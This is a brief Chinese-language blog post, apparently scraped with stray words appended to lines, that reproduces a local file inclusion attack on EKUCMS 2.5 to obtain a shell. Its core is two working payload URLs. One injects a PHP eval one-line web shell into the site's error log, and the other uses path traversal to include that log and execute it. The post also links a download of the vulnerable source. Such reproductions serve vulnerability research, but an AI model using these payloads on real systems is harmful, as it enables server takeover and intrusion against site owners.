易酷 cms2.5 本地文件包含漏洞 getshell

易酷 cms2.5  本地文件包含漏洞 getshellphp

首先下載源碼安裝(http://127.0.0.1/test/ekucms2.5/install.php)python

 安裝成功直接進行復現吧shell

本地包含一句話木馬網站

http://127.0.0.1/test/ekucms2.5/?s=my/show/id/{~eval($_POST[orange])}

 

 

會在網站的/temp/Logs/目錄下生成一個錯誤日誌,命名規則爲年_月_日3d

錯誤日誌內容日誌

 

進行包含錯誤日誌,地址:blog

http://127.0.0.1/test/ekucms2.5/?s=my/show/id/\..\temp\logs\18_04_18.log

 

 

驗證下:get

 

 

源碼連接(連接: https://pan.baidu.com/s/1K8dmimbrqO41tNemhnKeAQ 密碼: 3y48)源碼

相關文章
相關標籤/搜索